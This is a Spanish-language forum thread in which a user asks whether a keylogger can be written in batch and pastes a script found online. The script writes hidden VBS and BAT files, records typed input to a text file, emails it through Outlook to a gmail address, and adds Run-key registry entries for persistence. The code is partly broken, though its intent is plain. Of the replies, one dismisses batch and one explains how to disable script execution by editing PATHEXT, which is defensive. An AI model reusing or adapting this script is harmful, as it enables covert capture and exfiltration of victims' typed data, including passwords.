keylogger en batch?

Iniciado por **Aincrad**, 24 Julio 2017, 20:29 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

**Aincrad**

24 Julio 2017, 20:29 PM
Hola a todos queria saber si se puede hacer un keylogger en batch y que registre todo en un txt.  :huh:


en internet encontre este batch pero es mas que todo puro vbs.

aqui el code:
Código (bash) [Seleccionar]

@echo off
set location = %windir%\System32\stsyk.vbs
echo set shell = CreateObject("Wscript.Shell") >> %location%
echo shell.run "C:\windows\k.bat", 0 >> %location%
echo @echo off >> C:\windows\k.bat
echo color c9 >> C:\windows\k.bat
echo :go >> C:\windows\k.bat
echo echo .>>c:\keys.txt  >> C:\windows\k.bat
echo echo :  >> C:\windows\k.bat
echo set /p keys=  >> C:\windows\k.bat
echo echo %keys% >> c:\keys.txt  >> C:\windows\k.bat
echo goto go >> C:\windows\k.bat
echo start %location%  >> C:\windows\k.bat
echo(
echo Dim x > C:\kvqim.vbs
echo on error resume next >> C:\kvqim.vbs
echo Set fso =" Scripting.FileSystem.Object" >> C:\kvqim.vbs
echo Set so=CreateObject(fso) >> C:\kvqim.vbs
echo Set ol=CreateObject("Outlook.Application") >> C:\kvqim.vbs
echo Set out=WScript.CreateObject("Outlook.Application") >> C:\kvqim.vbs
echo Mail.to="cursedgaming@gmail.com">> C:\kvqim.vbs
echo Mail.Subject="Keylog" >> C:\kvqim.vbs
echo Mail.Body="" >> C:\kvqim.vbs
echo Mail.Attachments.Add("C:keys.txt") >> C:\kvqim.vbs
echo Mail.Send >> C:\kvqim.vbs
echo Next >> C:\kvqim.vbs
echo ol.Quit >> C:\kvqim.vbs
C:\kvqim.vbs
)>>C:\Windows\k.bat
ping localhost 5 > nul
del C:\kvqim.vbs
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d %location%
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\Windows\k.bat
attrib +h +s %location%
attrib +h +s C:\Windows\k.bat
attrib +h keys.txt
start %location%



engel lex

#1
24 Julio 2017, 20:35 PM
batch no es un lenguaje de programación... olvidate de hacer aplicaciones con batch... batch es solo un manejador de archivos por lotes (de ahí su nombre "batch") 

incluso funciones como "copy" en realidad es un .exe que batch llama para que haga una funcion...

necesitarás siempre un lenguaje de programación de verdad para que batch haga algo
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Serapis

#2
25 Julio 2017, 17:18 PM Ultima modificación: 25 Julio 2017, 17:27 PM por NEBIRE
Cita de: **Aincrad** en 24 Julio 2017, 20:29 PM
Hola a todos queria saber si se puede hacer un keylogger en batch y que registre todo en un txt.  :huh:

en internet encontre este batch pero es mas que todo puro vbs.
VBScript, es un lenguaje de Script basado en VB. De hecho puedes crear tus propias librerías y una vez compiladas y registradas debidamente podrías usarlas igual que el objeto "File System Object (fso)".

Ahora bien, los vbs están pensados para tareas administrativas o incluso de control en tu propio equipo (mantenimiento básicamente).
La recomendación es que si en tu equipo, no lo usas lo deshabilites, lo cual se hace editando directamente la variable de entorno: PATHEXT (Extensiones ejecutables para que nos entendamos)... por defecto (bajo windows) este es su valor:
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
Pero si uno lo edita y lo deja en:
PATHEXT=.COM;.EXE;.BAT;.CMD
Entonces se está deshabilitando la ejecución de ficheros de scripts (excepto los bat), luego tu keylogger, no servirá de nada si requiere la ejecución de un fichero .vbs.

Hubiera sido deseable que fuera posible ejecutar ficheros de scripts, sólo si yacen en cierta ruta específica y que se requiriera permisos para mover ficheros allí, entonces podría estar semihabilitado, es decir todo, nada o solo para los que yacen en esa carpeta y entonces para tareas de administración podrían tener mucha utilidad. Al no haber punto intermedio, lo mejor es deshabilitarlo para evitar toda posible ejecución de malware.

Puedes consultar rápidamente el valor de PATHEXT, desde la consola msdos, mediante el comando: echo %pathext%
(todas las variables de entorno, se pueden consultar desde ahí, del mismo modo (obviamente remplazando el nombre de la variable, por la que proceda).

Si quieres editar dicho valor, o bien acudes al registro:
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\ PATHEXT ...
O bien desde el:
panel de control/sistema/avanzado/botón variables de entorno/ localizarla en la lista de: 'Variables del sistema"

Esta variable también se usa para establecer la prioridad de ejecución. Cuando por ejemplo ejecutas un fichero basado solo en su nombre, peor hay más de un ejecutable con dicho nombre pero distinta extnsión (ejecutable), el que se ejecute será el primero en la lista de esta variable.
Así si tienes 4 ejecutables (en la misma ruta) llamados copy.bat, Copy.exe, copy.vbs y copy.com el que se ejecute será copy.com, porque cuando se busca en dicha lista, es el primero que aparece, si pretendieras que al escribir en una consola, un comando como: copy c:\*.* d:\*.* se ejecutara con copy.vbs (por ejemplo, porque es un ejecutable tuyo clónico que tiene opciones que no contempla el otro), cambia el orden que ocupan en la lista. Es harto difícil que haya en la misma carpeta, más de un ejecutable con el mismo nombre, pero esto resuelve el caso de qué ejecutable se está invocando, la otra forma es especificar el nombre completo del ejecutable.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario